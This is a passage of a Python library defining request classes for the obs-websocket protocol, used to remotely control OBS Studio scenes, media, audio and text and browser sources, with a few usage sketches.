self.datain['supported-image-export-formats'] = None
def getVersion(self):
return self.datain['version']
def getObsWebsocketVersion(self):
return self.datain['obs-websocket-version']
def getObsStudioVersion(self):
return self.datain['obs-studio-version']
def getAvailableRequests(self):
return self.datain['available-requests']
def getSupportedImageExportFormats(self):
return self.datain['supported-image-export-formats']
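# Illustrative usage with the obsws client shipped in this package (host, port and
# password are placeholders):
#   ws = obsws("localhost", 4444, "secret")
#   ws.connect()
#   print(ws.call(GetVersion()).getObsWebsocketVersion())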
class GetAuthRequired(Baserequests):
"""Tells the client if authentication is required. If so, returns authentication parameters `challenge`
and `salt` (see "Authentication" for more information).
:Returns:
*authRequired*
type: boolean
Indicates whether authentication is required.
*challenge*
type: String (optional)
*salt*
type: String (optional)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetAuthRequired'
self.datain['authRequired'] = None
self.datain['challenge'] = None
self.datain['salt'] = None
def getAuthRequired(self):
return self.datain['authRequired']
def getChallenge(self):
return self.datain['challenge']
def getSalt(self):
return self.datain['salt']
class Authenticate(Baserequests):
"""Attempt to authenticate the client to the server.
:Arguments:
*auth*
type: String
Response to the auth challenge (see "Authentication" for more information).
"""
def __init__(self, auth):
Baserequests.__init__(self)
self.name = 'Authenticate'
self.dataout['auth'] = auth
class SetHeartbeat(Baserequests):
"""Enable/disable sending of the Heartbeat event
:Arguments:
*enable*
type: boolean
Starts/Stops emitting heartbeat messages
"""
def __init__(self, enable):
Baserequests.__init__(self)
self.name = 'SetHeartbeat'
self.dataout['enable'] = enable
class SetFilenameFormatting(Baserequests):
"""Set the filename formatting string
:Arguments:
*filename_formatting*
type: String
Filename formatting string to set.
"""
def __init__(self, filename_formatting):
Baserequests.__init__(self)
self.name = 'SetFilenameFormatting'
self.dataout['filename-formatting'] = filename_formatting
class GetFilenameFormatting(Baserequests):
"""Get the filename formatting string
:Returns:
*filename_formatting*
type: String
Current filename formatting string.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetFilenameFormatting'
self.datain['filename-formatting'] = None
def getFilenameFormatting(self):
return self.datain['filename-formatting']
class GetStats(Baserequests):
"""Get OBS stats (almost the same info as provided in OBS' stats window)
:Returns:
*stats*
type: OBSStats
[OBS stats](#obsstats)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStats'
self.datain['stats'] = None
def getStats(self):
return self.datain['stats']
class BroadcastCustomMessage(Baserequests):
"""Broadcast custom message to all connected WebSocket clients
:Arguments:
*realm*
type: String
            Identifier to be chosen by the client
*data*
type: Object
User-defined data
"""
def __init__(self, realm, data):
Baserequests.__init__(self)
self.name = 'BroadcastCustomMessage'
self.dataout['realm'] = realm
self.dataout['data'] = data
class GetVideoInfo(Baserequests):
"""Get basic OBS video information
:Returns:
*baseWidth*
type: int
Base (canvas) width
*baseHeight*
type: int
Base (canvas) height
*outputWidth*
type: int
Output width
*outputHeight*
type: int
Output height
*scaleType*
type: String
Scaling method used if output size differs from base size
*fps*
type: double
Frames rendered per second
*videoFormat*
type: String
Video color format
*colorSpace*
type: String
Color space for YUV
*colorRange*
type: String
Color range (full or partial)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVideoInfo'
self.datain['baseWidth'] = None
self.datain['baseHeight'] = None
self.datain['outputWidth'] = None
self.datain['outputHeight'] = None
self.datain['scaleType'] = None
self.datain['fps'] = None
self.datain['videoFormat'] = None
self.datain['colorSpace'] = None
self.datain['colorRange'] = None
def getBaseWidth(self):
return self.datain['baseWidth']
def getBaseHeight(self):
return self.datain['baseHeight']
def getOutputWidth(self):
return self.datain['outputWidth']
def getOutputHeight(self):
return self.datain['outputHeight']
def getScaleType(self):
return self.datain['scaleType']
def getFps(self):
return self.datain['fps']
def getVideoFormat(self):
return self.datain['videoFormat']
def getColorSpace(self):
return self.datain['colorSpace']
def getColorRange(self):
return self.datain['colorRange']
class OpenProjector(Baserequests):
"""Open a projector window or create a projector on a monitor. Requires OBS v24.0.4 or newer.
:Arguments:
*type*
type: String (Optional)
Type of projector: `Preview` (default), `Source`, `Scene`, `StudioProgram`, or `Multiview` (case insensitive).
*monitor*
type: int (Optional)
Monitor to open the projector on. If -1 or omitted, opens a window.
*geometry*
type: String (Optional)
Size and position of the projector window (only if monitor is -1). Encoded in Base64 using [Qt's geometry encoding](https://doc.qt.io/qt-5/qwidget.html#saveGeometry). Corresponds to OBS's saved projectors.
*name*
type: String (Optional)
Name of the source or scene to be displayed (ignored for other projector types).
"""
def __init__(self, type, monitor, geometry, name):
Baserequests.__init__(self)
self.name = 'OpenProjector'
self.dataout['type'] = type
self.dataout['monitor'] = monitor
self.dataout['geometry'] = geometry
self.dataout['name'] = name
class TriggerHotkeyByName(Baserequests):
"""Executes hotkey routine, identified by hotkey unique name
:Arguments:
*hotkeyName*
type: String
Unique name of the hotkey, as defined when registering the hotkey (e.g. "ReplayBuffer.Save")
"""
def __init__(self, hotkeyName):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyByName'
self.dataout['hotkeyName'] = hotkeyName
class TriggerHotkeyBySequence(Baserequests):
"""Executes hotkey routine, identified by bound combination of keys. A single key combination might trigger multiple hotkey routines depending on user settings
:Arguments:
*keyId*
type: String
Main key identifier (e.g. `OBS_KEY_A` for key "A"). Available identifiers [here](https://github.com/obsproject/obs-studio/blob/master/libobs/obs-hotkeys.h)
*keyModifiers*
type: Object (Optional)
            Optional key modifiers object. False entries can be omitted
*keyModifiers.shift*
type: boolean
Trigger Shift Key
*keyModifiers.alt*
type: boolean
Trigger Alt Key
*keyModifiers.control*
type: boolean
Trigger Control (Ctrl) Key
*keyModifiers.command*
type: boolean
Trigger Command Key (Mac)
"""
def __init__(self, keyId, keyModifiers):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyBySequence'
self.dataout['keyId'] = keyId
self.dataout['keyModifiers'] = keyModifiers
class PlayPauseMedia(Baserequests):
"""Pause or play a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*playPause*
type: boolean
Whether to pause or play the source. `false` for play, `true` for pause.
"""
def __init__(self, sourceName, playPause):
Baserequests.__init__(self)
self.name = 'PlayPauseMedia'
self.dataout['sourceName'] = sourceName
self.dataout['playPause'] = playPause
class RestartMedia(Baserequests):
"""Restart a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'RestartMedia'
self.dataout['sourceName'] = sourceName
class StopMedia(Baserequests):
"""Stop a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'StopMedia'
self.dataout['sourceName'] = sourceName
class NextMedia(Baserequests):
"""Skip to the next media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'NextMedia'
self.dataout['sourceName'] = sourceName
class PreviousMedia(Baserequests):
"""Go to the previous media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'PreviousMedia'
self.dataout['sourceName'] = sourceName
class GetMediaDuration(Baserequests):
"""Get the length of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: For some reason, for the first 5 or so seconds that the media is playing, the total duration can be off by upwards of 50ms.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaDuration*
type: int
The total length of media in milliseconds..
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaDuration'
self.datain['mediaDuration'] = None
self.dataout['sourceName'] = sourceName
def getMediaDuration(self):
return self.datain['mediaDuration']
class GetMediaTime(Baserequests):
"""Get the current timestamp of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*timestamp*
type: int
The time in milliseconds since the start of the media.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaTime'
self.datain['timestamp'] = None
self.dataout['sourceName'] = sourceName
def getTimestamp(self):
return self.datain['timestamp']
class SetMediaTime(Baserequests):
"""Set the timestamp of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*timestamp*
type: int
Milliseconds to set the timestamp to.
"""
def __init__(self, sourceName, timestamp):
Baserequests.__init__(self)
self.name = 'SetMediaTime'
self.dataout['sourceName'] = sourceName
self.dataout['timestamp'] = timestamp
class ScrubMedia(Baserequests):
"""Scrub media using a supplied offset. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: Due to processing/network delays, this request is not perfect. The processing rate of this request has also not been tested.
:Arguments:
*sourceName*
type: String
Source name.
*timeOffset*
type: int
Millisecond offset (positive or negative) to offset the current media position.
"""
def __init__(self, sourceName, timeOffset):
Baserequests.__init__(self)
self.name = 'ScrubMedia'
self.dataout['sourceName'] = sourceName
self.dataout['timeOffset'] = timeOffset
class GetMediaState(Baserequests):
"""Get the current playing state of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaState*
type: String
The media state of the provided source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaState'
self.datain['mediaState'] = None
self.dataout['sourceName'] = sourceName
def getMediaState(self):
return self.datain['mediaState']
class GetMediaSourcesList(Baserequests):
"""List the media state of all media sources (vlc and media source)
:Returns:
*mediaSources*
type: Array<Object>
Array of sources
*mediaSources.*.sourceName*
type: String
Unique source name
*mediaSources.*.sourceKind*
type: String
Unique source internal type (a.k.a `ffmpeg_source` or `vlc_source`)
*mediaSources.*.mediaState*
type: String
The current state of media for that source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetMediaSourcesList'
self.datain['mediaSources'] = None
def getMediaSources(self):
return self.datain['mediaSources']
class CreateSource(Baserequests):
"""Create a source and add it as a sceneitem to a scene.
:Arguments:
*sourceName*
type: String
Source name.
*sourceKind*
type: String
Source kind, Eg. `vlc_source`.
*sceneName*
type: String
Scene to add the new source to.
*sourceSettings*
type: Object (optional)
Source settings data.
*setVisible*
type: boolean (optional)
Set the created SceneItem as visible or not. Defaults to true
:Returns:
*itemId*
type: int
ID of the SceneItem in the scene.
"""
def __init__(self, sourceName, sourceKind, sceneName, sourceSettings=None, setVisible=None):
Baserequests.__init__(self)
self.name = 'CreateSource'
self.datain['itemId'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceKind'] = sourceKind
self.dataout['sceneName'] = sceneName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class GetSourcesList(Baserequests):
"""List all sources available in the running OBS instance
:Returns:
*sources*
type: Array<Object>
Array of sources
*sources.*.name*
type: String
Unique source name
*sources.*.typeId*
type: String
Non-unique source internal type (a.k.a kind)
*sources.*.type*
type: String
Source type. Value is one of the following: "input", "filter", "transition", "scene" or "unknown"
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourcesList'
self.datain['sources'] = None
def getSources(self):
return self.datain['sources']
class GetSourceTypesList(Baserequests):
"""Get a list of all available sources types
:Returns:
*types*
type: Array<Object>
Array of source types
*types.*.typeId*
type: String
Non-unique internal source type ID
*types.*.displayName*
type: String
Display name of the source type
*types.*.type*
type: String
Type. Value is one of the following: "input", "filter", "transition" or "other"
*types.*.defaultSettings*
type: Object
Default settings of this source type
*types.*.caps*
type: Object
Source type capabilities
*types.*.caps.isAsync*
type: Boolean
True if source of this type provide frames asynchronously
*types.*.caps.hasVideo*
type: Boolean
True if sources of this type provide video
*types.*.caps.hasAudio*
type: Boolean
True if sources of this type provide audio
*types.*.caps.canInteract*
type: Boolean
True if interaction with this sources of this type is possible
*types.*.caps.isComposite*
type: Boolean
True if sources of this type composite one or more sub-sources
*types.*.caps.doNotDuplicate*
type: Boolean
True if sources of this type should not be fully duplicated
*types.*.caps.doNotSelfMonitor*
type: Boolean
True if sources of this type may cause a feedback loop if it's audio is monitored and shouldn't be
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourceTypesList'
self.datain['types'] = None
def getTypes(self):
return self.datain['types']
class GetVolume(Baserequests):
"""Get the volume of the specified source. Default response uses mul format, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*useDecibel*
type: boolean (optional)
Output volume in decibels of attenuation instead of amplitude/mul.
:Returns:
*name*
type: String
Source name.
*volume*
type: double
Volume of the source. Between `0.0` and `20.0` if using mul, under `26.0` if using dB.
*muted*
type: boolean
Indicates whether the source is muted.
"""
def __init__(self, source, useDecibel=None):
Baserequests.__init__(self)
self.name = 'GetVolume'
self.datain['name'] = None
self.datain['volume'] = None
self.datain['muted'] = None
self.dataout['source'] = source
self.dataout['useDecibel'] = useDecibel
def getName(self):
return self.datain['name']
def getVolume(self):
return self.datain['volume']
def getMuted(self):
return self.datain['muted']
class SetVolume(Baserequests):
"""Set the volume of the specified source. Default request format uses mul, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*volume*
type: double
Desired volume. Must be between `0.0` and `20.0` for mul, and under 26.0 for dB. OBS will interpret dB values under -100.0 as Inf. Note: The OBS volume sliders only reach a maximum of 1.0mul/0.0dB, however OBS actually supports larger values.
*useDecibel*
type: boolean (optional)
Interperet `volume` data as decibels instead of amplitude/mul.
"""
def __init__(self, source, volume, useDecibel=None):
Baserequests.__init__(self)
self.name = 'SetVolume'
self.dataout['source'] = source
self.dataout['volume'] = volume
self.dataout['useDecibel'] = useDecibel
class GetMute(Baserequests):
"""Get the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*muted*
type: boolean
Mute status of the source.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetMute'
self.datain['name'] = None
self.datain['muted'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getMuted(self):
return self.datain['muted']
class SetMute(Baserequests):
"""Sets the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
*mute*
type: boolean
Desired mute status.
"""
def __init__(self, source, mute):
Baserequests.__init__(self)
self.name = 'SetMute'
self.dataout['source'] = source
self.dataout['mute'] = mute
class ToggleMute(Baserequests):
"""Inverts the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'ToggleMute'
self.dataout['source'] = source
class GetAudioActive(Baserequests):
"""Get the audio's active status of a specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*audioActive*
type: boolean
Audio active status of the source.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioActive'
self.datain['audioActive'] = None
self.dataout['sourceName'] = sourceName
def getAudioActive(self):
return self.datain['audioActive']
class SetSourceName(Baserequests):
"""
Note: If the new name already exists as a source, obs-websocket will return an error.
:Arguments:
*sourceName*
type: String
Source name.
*newName*
type: String
New source name.
"""
def __init__(self, sourceName, newName):
Baserequests.__init__(self)
self.name = 'SetSourceName'
self.dataout['sourceName'] = sourceName
self.dataout['newName'] = newName
class SetSyncOffset(Baserequests):
"""Set the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
*offset*
type: int
The desired audio sync offset (in nanoseconds).
"""
def __init__(self, source, offset):
Baserequests.__init__(self)
self.name = 'SetSyncOffset'
self.dataout['source'] = source
self.dataout['offset'] = offset
class GetSyncOffset(Baserequests):
"""Get the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*offset*
type: int
The audio sync offset (in nanoseconds).
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetSyncOffset'
self.datain['name'] = None
self.datain['offset'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getOffset(self):
return self.datain['offset']
class GetSourceSettings(Baserequests):
"""Get settings of the specified source
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking if you expect a specific settings schema.
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
"""
def __init__(self, sourceName, sourceType=None):
Baserequests.__init__(self)
self.name = 'GetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class SetSourceSettings(Baserequests):
"""Set settings of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking to avoid applying a set of settings incompatible with the actual source's type.
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Updated source settings
"""
def __init__(self, sourceName, sourceSettings, sourceType=None):
Baserequests.__init__(self)
self.name = 'SetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
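# --- Usage sketch (not part of the generated protocol classes) --------------
# GetSourceSettings/SetSourceSettings exchange a plain dict whose keys vary per
# source kind. The sketch below reads the current settings, merges in a few
# changes and writes the result back. `ws` is an assumed connected client; the
# key names passed by a caller (e.g. `local_file` for a media source) depend on
# the source type and are not fixed by this module.
def _example_patch_source_settings(ws, source_name, **changes):
    """Merge `changes` into the current settings of `source_name`."""
    current = ws.call(GetSourceSettings(source_name)).getSourceSettings()
    current.update(changes)
    return ws.call(SetSourceSettings(source_name, current))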
class GetTextGDIPlusProperties(Baserequests):
"""Get the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*align*
type: String
Text Alignment ("left", "center", "right").
*bk_color*
type: int
Background color.
*bk_opacity*
type: int
Background opacity (0-100).
*chatlog*
type: boolean
Chat log.
*chatlog_lines*
type: int
Chat log lines.
*color*
type: int
Text color.
*extents*
type: boolean
Extents wrap.
*extents_cx*
type: int
Extents cx.
*extents_cy*
type: int
Extents cy.
*file*
type: String
File path name.
*read_from_file*
type: boolean
Read text from the specified file.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*gradient*
type: boolean
Gradient enabled.
*gradient_color*
type: int
Gradient color.
*gradient_dir*
type: float
Gradient direction.
*gradient_opacity*
type: int
Gradient opacity (0-100).
*outline*
type: boolean
Outline.
*outline_color*
type: int
Outline color.
*outline_size*
type: int
Outline size.
*outline_opacity*
type: int
Outline opacity (0-100).
*text*
type: String
Text content to be displayed.
*valign*
type: String
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean
Vertical text enabled.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextGDIPlusProperties'
self.datain['source'] = None
self.datain['align'] = None
self.datain['bk_color'] = None
self.datain['bk_opacity'] = None
self.datain['chatlog'] = None
self.datain['chatlog_lines'] = None
self.datain['color'] = None
self.datain['extents'] = None
self.datain['extents_cx'] = None
self.datain['extents_cy'] = None
self.datain['file'] = None
self.datain['read_from_file'] = None
self.datain['font'] = None
self.datain['gradient'] = None
self.datain['gradient_color'] = None
self.datain['gradient_dir'] = None
self.datain['gradient_opacity'] = None
self.datain['outline'] = None
self.datain['outline_color'] = None
self.datain['outline_size'] = None
self.datain['outline_opacity'] = None
self.datain['text'] = None
self.datain['valign'] = None
self.datain['vertical'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getAlign(self):
return self.datain['align']
def getBk_color(self):
return self.datain['bk_color']
def getBk_opacity(self):
return self.datain['bk_opacity']
def getChatlog(self):
return self.datain['chatlog']
def getChatlog_lines(self):
return self.datain['chatlog_lines']
def getColor(self):
return self.datain['color']
def getExtents(self):
return self.datain['extents']
def getExtents_cx(self):
return self.datain['extents_cx']
def getExtents_cy(self):
return self.datain['extents_cy']
def getFile(self):
return self.datain['file']
def getRead_from_file(self):
return self.datain['read_from_file']
def getFont(self):
return self.datain['font']
def getGradient(self):
return self.datain['gradient']
def getGradient_color(self):
return self.datain['gradient_color']
def getGradient_dir(self):
return self.datain['gradient_dir']
def getGradient_opacity(self):
return self.datain['gradient_opacity']
def getOutline(self):
return self.datain['outline']
def getOutline_color(self):
return self.datain['outline_color']
def getOutline_size(self):
return self.datain['outline_size']
def getOutline_opacity(self):
return self.datain['outline_opacity']
def getText(self):
return self.datain['text']
def getValign(self):
return self.datain['valign']
def getVertical(self):
return self.datain['vertical']
class SetTextGDIPlusProperties(Baserequests):
"""Set the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Name of the source.
*align*
type: String (optional)
Text Alignment ("left", "center", "right").
*bk_color*
type: int (optional)
Background color.
*bk_opacity*
type: int (optional)
Background opacity (0-100).
*chatlog*
type: boolean (optional)
Chat log.
*chatlog_lines*
type: int (optional)
Chat log lines.
*color*
type: int (optional)
Text color.
*extents*
type: boolean (optional)
Extents wrap.
*extents_cx*
type: int (optional)
Extents cx.
*extents_cy*
type: int (optional)
Extents cy.
*file*
type: String (optional)
File path name.
*read_from_file*
type: boolean (optional)
Read text from the specified file.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*gradient*
type: boolean (optional)
Gradient enabled.
*gradient_color*
type: int (optional)
Gradient color.
*gradient_dir*
type: float (optional)
Gradient direction.
*gradient_opacity*
type: int (optional)
Gradient opacity (0-100).
*outline*
type: boolean (optional)
Outline.
*outline_color*
type: int (optional)
Outline color.
*outline_size*
type: int (optional)
Outline size.
*outline_opacity*
type: int (optional)
Outline opacity (0-100).
*text*
type: String (optional)
Text content to be displayed.
*valign*
type: String (optional)
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean (optional)
Vertical text enabled.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, align=None, bk_color=None, bk_opacity=None, chatlog=None, chatlog_lines=None, color=None, extents=None, extents_cx=None, extents_cy=None, file=None, read_from_file=None, font=None, gradient=None, gradient_color=None, gradient_dir=None, gradient_opacity=None, outline=None, outline_color=None, outline_size=None, outline_opacity=None, text=None, valign=None, vertical=None, render=None):
Baserequests.__init__(self)
self.name = 'SetTextGDIPlusProperties'
self.dataout['source'] = source
self.dataout['align'] = align
self.dataout['bk_color'] = bk_color
self.dataout['bk_opacity'] = bk_opacity
self.dataout['chatlog'] = chatlog
self.dataout['chatlog_lines'] = chatlog_lines
self.dataout['color'] = color
self.dataout['extents'] = extents
self.dataout['extents_cx'] = extents_cx
self.dataout['extents_cy'] = extents_cy
self.dataout['file'] = file
self.dataout['read_from_file'] = read_from_file
self.dataout['font'] = font
self.dataout['gradient'] = gradient
self.dataout['gradient_color'] = gradient_color
self.dataout['gradient_dir'] = gradient_dir
self.dataout['gradient_opacity'] = gradient_opacity
self.dataout['outline'] = outline
self.dataout['outline_color'] = outline_color
self.dataout['outline_size'] = outline_size
self.dataout['outline_opacity'] = outline_opacity
self.dataout['text'] = text
self.dataout['valign'] = valign
self.dataout['vertical'] = vertical
self.dataout['render'] = render
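# --- Usage sketch (not part of the generated protocol classes) --------------
# All properties of SetTextGDIPlusProperties except `source` are optional, so a
# caller typically passes only the fields it wants to change, as documented
# above. `ws` is an assumed connected client and the source name "Headline" is
# a placeholder for an existing Text (GDI+) source.
def _example_update_headline(ws, text, color=0xFFFFFF):
    """Replace the text and color of a Text (GDI+) source named 'Headline'."""
    return ws.call(SetTextGDIPlusProperties("Headline", text=text, color=color))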
class GetTextFreetype2Properties(Baserequests):
"""Get the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name
*color1*
type: int
Gradient top color.
*color2*
type: int
Gradient bottom color.
*custom_width*
type: int
Custom width (0 to disable).
*drop_shadow*
type: boolean
Drop shadow.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*from_file*
type: boolean
Read text from the specified file.
*log_mode*
type: boolean
Chat log.
*outline*
type: boolean
Outline.
*text*
type: String
Text content to be displayed.
*text_file*
type: String
File path.
*word_wrap*
type: boolean
Word wrap.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextFreetype2Properties'
self.datain['source'] = None
self.datain['color1'] = None
self.datain['color2'] = None
self.datain['custom_width'] = None
self.datain['drop_shadow'] = None
self.datain['font'] = None
self.datain['from_file'] = None
self.datain['log_mode'] = None
self.datain['outline'] = None
self.datain['text'] = None
self.datain['text_file'] = None
self.datain['word_wrap'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getColor1(self):
return self.datain['color1']
def getColor2(self):
return self.datain['color2']
def getCustom_width(self):
return self.datain['custom_width']
def getDrop_shadow(self):
return self.datain['drop_shadow']
def getFont(self):
return self.datain['font']
def getFrom_file(self):
return self.datain['from_file']
def getLog_mode(self):
return self.datain['log_mode']
def getOutline(self):
return self.datain['outline']
def getText(self):
return self.datain['text']
def getText_file(self):
return self.datain['text_file']
def getWord_wrap(self):
return self.datain['word_wrap']
class SetTextFreetype2Properties(Baserequests):
"""Set the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
*color1*
type: int (optional)
Gradient top color.
*color2*
type: int (optional)
Gradient bottom color.
*custom_width*
type: int (optional)
Custom width (0 to disable).
*drop_shadow*
type: boolean (optional)
Drop shadow.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*from_file*
type: boolean (optional)
Read text from the specified file.
*log_mode*
type: boolean (optional)
Chat log.
*outline*
type: boolean (optional)
Outline.
*text*
type: String (optional)
Text content to be displayed.
*text_file*
type: String (optional)
File path.
*word_wrap*
type: boolean (optional)
Word wrap.
"""
def __init__(self, source, color1=None, color2=None, custom_width=None, drop_shadow=None, font=None, from_file=None, log_mode=None, outline=None, text=None, text_file=None, word_wrap=None):
Baserequests.__init__(self)
self.name = 'SetTextFreetype2Properties'
self.dataout['source'] = source
self.dataout['color1'] = color1
self.dataout['color2'] = color2
self.dataout['custom_width'] = custom_width
self.dataout['drop_shadow'] = drop_shadow
self.dataout['font'] = font
self.dataout['from_file'] = from_file
self.dataout['log_mode'] = log_mode
self.dataout['outline'] = outline
self.dataout['text'] = text
self.dataout['text_file'] = text_file
self.dataout['word_wrap'] = word_wrap
class GetBrowserSourceProperties(Baserequests):
"""Get current properties for a Browser Source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*is_local_file*
type: boolean
Indicates that a local file is in use.
*local_file*
type: String
File path.
*url*
type: String
Url.
*css*
type: String
CSS to inject.
*width*
type: int
Width.
*height*
type: int
Height.
*fps*
type: int
Framerate.
*shutdown*
type: boolean
Indicates whether the source should be shutdown when not visible.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetBrowserSourceProperties'
self.datain['source'] = None
self.datain['is_local_file'] = None
self.datain['local_file'] = None
self.datain['url'] = None
self.datain['css'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['fps'] = None
self.datain['shutdown'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getIs_local_file(self):
return self.datain['is_local_file']
def getLocal_file(self):
return self.datain['local_file']
def getUrl(self):
return self.datain['url']
def getCss(self):
return self.datain['css']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getFps(self):
return self.datain['fps']
def getShutdown(self):
return self.datain['shutdown']
class SetBrowserSourceProperties(Baserequests):
"""Set current properties for a Browser Source.
:Arguments:
*source*
type: String
Name of the source.
*is_local_file*
type: boolean (optional)
Indicates that a local file is in use.
*local_file*
type: String (optional)
file path.
*url*
type: String (optional)
Url.
*css*
type: String (optional)
CSS to inject.
*width*
type: int (optional)
Width.
*height*
type: int (optional)
Height.
*fps*
type: int (optional)
Framerate.
*shutdown*
type: boolean (optional)
Indicates whether the source should be shutdown when not visible.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
